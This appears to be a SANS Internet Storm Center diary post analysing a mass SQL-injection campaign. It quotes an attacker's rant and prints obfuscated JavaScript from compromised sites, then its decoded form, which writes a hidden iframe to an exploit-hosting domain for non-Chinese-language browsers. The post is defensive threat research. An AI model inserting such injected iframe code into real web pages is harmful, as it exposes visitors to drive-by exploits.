Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: War of the worlds? SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
War of the worlds?

There have been a lot of discussions going on about these injection attacks. The one thing in common so far has been that the culprits are abusing security vulnerabilities in various web applications, mainly SQL injection.

Exploiting of such vulnerabilities became relatively easy (since there are many vulnerable applications that use similar backend logic), so the bad guys started releasing various tools that enable them to compromise sites automatically. I analyzed one such tool at http://isc.sans.org/diary.html?storyid=4294, which was probably used for a lot of SQL injection attacks we have seen lately (but be aware that other similar tools exist and are actively used in the underground, one such tool in use with botnets was analyzed by Joe at SecureWorks, http://www.secureworks.com/research/threats/danmecasprox/).

While the motive for this is more or less standard – steal credentials or virtual goods so you can convert/sell that for real money (Mike and Steven from Shadowserver posted very nice articles at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507 and http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080513) - while analyzing one such site today I saw an interesting rant, presumably by the author.

The site has already been mentioned multiple times (www.ririwow.cn, which appears to be finally taken down). The majority of attacks actually pointed to this site which happily served some exploits to the end user. However, this time the main index.htm file had this text appended at the bottom:

"This is a mass invasion.        Safeguard the motherland's dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com "

(language edited)
Interesting. While this could have been added by anyone, I found another interesting thing thanks to a heads up from our friend Paul from pauldotcom.com. Paul analyzed a compromised site which had this piece of JavaScript inserted:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode
(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return[e]}];e=functio
n(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp}('8(b.e==\'i-2\
'){}4{3.g("<9d=7:\/\/h.c.2\/a.6 f=15=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index
|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}))

After deobfuscating the code, we get this:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}

In other words, the code checks if the system language variable is set to ZH-CN (which is set on systems running in Chinese) and redirects you to the site hosting exploit only if that is not true. So the rant might really be from the author, after all since the code is attacking all non-Chinese machines. Are we getting more serious with this or the bottom line is still (and only) information stealing and money.

--

Bojan

I will be teaching next: Web App Penetration Testing and Ethical Hacking - SANS Northern VA - Reston Spring 2020

Bojan

390 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!